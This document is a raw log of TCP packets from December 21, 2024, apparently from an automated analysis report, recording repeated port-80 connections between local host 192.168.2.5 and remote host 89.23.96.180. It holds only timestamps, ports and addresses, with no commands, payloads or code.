                                                                                  Dec 21, 2024 10:03:05.839680910 CET4983380192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:05.839688063 CET4983980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:05.846609116 CET4983980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:05.968043089 CET804983989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:05.975554943 CET4984080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:06.095195055 CET804984089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:06.095731974 CET4984080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:06.096024990 CET4984080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:06.202867031 CET4983980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:06.215563059 CET804984089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:06.323332071 CET804983989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:06.323554039 CET804983989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:06.452903986 CET4984080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:06.572550058 CET804984089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:06.572616100 CET804984089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:06.572662115 CET804984089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:07.216780901 CET804983989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:07.265414953 CET4983980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.456120014 CET804983989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:07.472363949 CET804984089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:07.499684095 CET4983980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.515326977 CET4984080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.708254099 CET804984089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:07.749819040 CET4984080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.823257923 CET4983980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.823514938 CET4984680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.823559999 CET4984080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.943115950 CET804984689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:07.943228006 CET4984680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.943351030 CET804983989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:07.943376064 CET4984680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.943425894 CET4983980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:07.943835020 CET804984089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:07.943902969 CET4984080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:08.063003063 CET804984689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:08.296780109 CET4984680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:08.416475058 CET804984689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:08.416512966 CET804984689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:08.416542053 CET804984689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:09.319072962 CET804984689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:09.374779940 CET4984680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:09.553232908 CET804984689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:09.593427896 CET4984680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:09.666773081 CET4985280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:09.786410093 CET804985289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:09.786498070 CET4985280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:09.786612988 CET4985280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:09.906198025 CET804985289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:10.140436888 CET4985280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:10.262075901 CET804985289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:10.262175083 CET804985289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:10.262206078 CET804985289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:11.164343119 CET804985289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:11.218427896 CET4985280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:11.405324936 CET804985289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:11.452836037 CET4985280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:11.527240038 CET4985280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:11.527319908 CET4985880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:11.646924019 CET804985889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:11.647021055 CET4985880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:11.647093058 CET804985289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:11.647157907 CET4985280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:11.647213936 CET4985880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:11.767465115 CET804985889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:11.999799967 CET4985880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:12.119699955 CET804985889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:12.119736910 CET804985889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:12.119771004 CET804985889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:12.469310045 CET4985980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:12.469552994 CET4985880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:12.588900089 CET804985989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:12.588999033 CET4985980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:12.589409113 CET4985980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:12.612932920 CET4986080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:12.632473946 CET804985889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:12.685060024 CET804985889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:12.685143948 CET4985880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:12.709202051 CET804985989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:12.732692957 CET804986089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:12.732773066 CET4986080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:12.732861996 CET4986080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:12.852319956 CET804986089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:12.937417030 CET4985980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:13.059310913 CET804985989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:13.061161041 CET804985989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:13.077872038 CET4986080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:13.199512005 CET804986089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:13.199547052 CET804986089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:13.199582100 CET804986089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:13.966227055 CET804985989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:14.015341043 CET4985980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.110999107 CET804986089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:14.155949116 CET4986080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.200320005 CET804985989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:14.249716043 CET4985980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.345910072 CET804986089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:14.390331030 CET4986080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.467483044 CET4986080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.467485905 CET4985980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.467873096 CET4986680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.587522984 CET804986689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:14.587622881 CET4986680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.587723017 CET4986680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.587765932 CET804986089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:14.587826967 CET4986080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.588404894 CET804985989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:14.588460922 CET4985980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:14.707521915 CET804986689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:14.937371969 CET4986680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:15.057080030 CET804986689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:15.057145119 CET804986689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:15.057177067 CET804986689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:15.964498997 CET804986689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:16.015352011 CET4986680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:16.200102091 CET804986689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:16.249737024 CET4986680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:16.326572895 CET4987280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:16.449949980 CET804987289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:16.450052023 CET4987280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:16.450193882 CET4987280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:16.569722891 CET804987289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:16.796677113 CET4987280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:16.916764975 CET804987289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:16.916802883 CET804987289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:16.916846991 CET804987289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:17.826412916 CET804987289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:17.874804974 CET4987280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:18.060036898 CET804987289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:18.109160900 CET4987280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:18.183995962 CET4987280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:18.184309959 CET4987880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:18.303944111 CET804987889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:18.304040909 CET4987880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:18.304105997 CET804987289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:18.304194927 CET4987880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:18.304195881 CET4987280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:18.426244974 CET804987889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:18.656219959 CET4987880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:18.775969028 CET804987889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:18.776082039 CET804987889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:18.776132107 CET804987889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.203727007 CET4987980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.203865051 CET4987880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.323478937 CET804987989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.323554993 CET4987980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.323671103 CET4987980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.326740980 CET4988080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.343398094 CET804987889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.343470097 CET4987880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.443284988 CET804987989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.446321964 CET804988089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.446494102 CET4988080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.446525097 CET4988080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.566180944 CET804988089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.671624899 CET4987980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.791382074 CET804987989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.791589022 CET804987989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.796644926 CET4988080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:19.916357040 CET804988089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.916392088 CET804988089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:19.916444063 CET804988089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:20.702681065 CET804987989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:20.749713898 CET4987980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:20.822717905 CET804988089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:20.874744892 CET4988080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:20.936233044 CET804987989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:20.984096050 CET4987980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.056458950 CET804988089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:21.109152079 CET4988080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.184240103 CET4987980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.184305906 CET4988080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.184602022 CET4988680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.304394007 CET804988689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:21.304562092 CET804987989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:21.304564953 CET4988680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.304636955 CET804988089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:21.304656982 CET4987980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.304739952 CET4988080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.304965019 CET4988680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.424523115 CET804988689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:21.656048059 CET4988680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:21.776134014 CET804988689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:21.776191950 CET804988689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:21.776221037 CET804988689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:22.681952953 CET804988689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:22.734075069 CET4988680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:22.916294098 CET804988689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:22.970649958 CET4988680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:23.060086966 CET4988680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:23.061633110 CET4989280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:23.180305004 CET804988689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:23.180430889 CET4988680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:23.181348085 CET804989289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:23.181444883 CET4989280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:23.181540012 CET4989280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:23.301127911 CET804989289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:23.531157970 CET4989280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:23.650885105 CET804989289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:23.650949001 CET804989289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:23.650980949 CET804989289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:24.572820902 CET804989289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:24.624813080 CET4989280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:24.792654037 CET804989289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:24.843614101 CET4989280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:24.916884899 CET4989280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:24.917042971 CET4989880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:25.037240982 CET804989889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:25.037338018 CET4989880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:25.037494898 CET4989880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:25.037602901 CET804989289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:25.037795067 CET4989280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:25.157147884 CET804989889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:25.391743898 CET4989880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:25.511702061 CET804989889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:25.511723042 CET804989889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:25.511737108 CET804989889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:25.938117981 CET4989880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:25.938179016 CET4989980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:26.057867050 CET804989989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:26.057976961 CET4989980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:26.058182001 CET4989980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:26.077157974 CET804989889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:26.077245951 CET4989880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:26.104302883 CET4990080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:26.177721024 CET804989989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:26.224108934 CET804990089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:26.225240946 CET4990080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:26.225400925 CET4990080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:26.347208977 CET804990089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:26.406065941 CET4989980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:26.527515888 CET804989989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:26.527527094 CET804989989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:26.577965021 CET4990080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:26.698256969 CET804990089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:26.698328018 CET804990089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:26.698338985 CET804990089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:27.438586950 CET804989989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:27.484102011 CET4989980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:27.602607965 CET804990089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:27.655967951 CET4990080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:27.672333002 CET804989989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:27.718463898 CET4989980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:27.837593079 CET804990089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:27.890322924 CET4990080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:27.966274023 CET4989980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:27.966556072 CET4990080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:27.966638088 CET4990680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:28.086496115 CET804989989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:28.086617947 CET4989980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:28.087227106 CET804990689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:28.087300062 CET4990680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:28.087357998 CET804990089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:28.087412119 CET4990080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:28.087495089 CET4990680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:28.208982944 CET804990689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:28.437304974 CET4990680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:28.557157040 CET804990689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:28.557193041 CET804990689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:28.557224035 CET804990689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:29.468010902 CET804990689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:29.515424967 CET4990680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:29.700345039 CET804990689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:29.749727011 CET4990680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:29.828243971 CET4991280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:29.949557066 CET804991289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:29.949911118 CET4991280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:29.950001001 CET4991280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:30.070261955 CET804991289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:30.296660900 CET4991280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:30.416455030 CET804991289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:30.416466951 CET804991289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:30.416593075 CET804991289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:31.326145887 CET804991289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:31.374726057 CET4991280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:31.560184956 CET804991289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:31.609199047 CET4991280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:31.685281992 CET4991280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:31.685564041 CET4991880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:31.806315899 CET804991289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:31.806411982 CET804991889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:31.806422949 CET4991280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:31.806502104 CET4991880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:31.806632042 CET4991880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:31.926287889 CET804991889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:32.200653076 CET4991880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:32.321664095 CET804991889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:32.321717978 CET804991889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:32.321746111 CET804991889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:32.688066959 CET4991880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:32.688165903 CET4991980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:32.807899952 CET804991989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:32.807991028 CET4992080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:32.807991028 CET4991980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:32.808115959 CET4991980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:32.845385075 CET804991889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:32.845459938 CET4991880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:32.927803040 CET804992089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:32.927822113 CET804991989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:32.927896976 CET4992080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:32.928050041 CET4992080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:33.047696114 CET804992089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:33.156048059 CET4991980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:33.275643110 CET804991989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:33.275758982 CET804991989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:33.281277895 CET4992080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:33.401021004 CET804992089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:33.401037931 CET804992089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:33.401052952 CET804992089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:34.186583996 CET804991989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:34.234114885 CET4991980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.305059910 CET804992089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:34.348037958 CET4992080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.420625925 CET804991989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:34.468559027 CET4991980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.540568113 CET804992089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:34.593483925 CET4992080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.667234898 CET4991980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.667309046 CET4992080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.667612076 CET4992680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.787733078 CET804992689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:34.787770033 CET804991989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:34.787926912 CET4991980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.788189888 CET804992089.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:34.788235903 CET4992680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.788264036 CET4992080192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.796835899 CET4992680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:34.916398048 CET804992689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:35.156455040 CET4992680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:35.276299000 CET804992689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:35.276330948 CET804992689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:35.276365995 CET804992689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:36.163799047 CET804992689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:36.218529940 CET4992680192.168.2.589.23.96.180
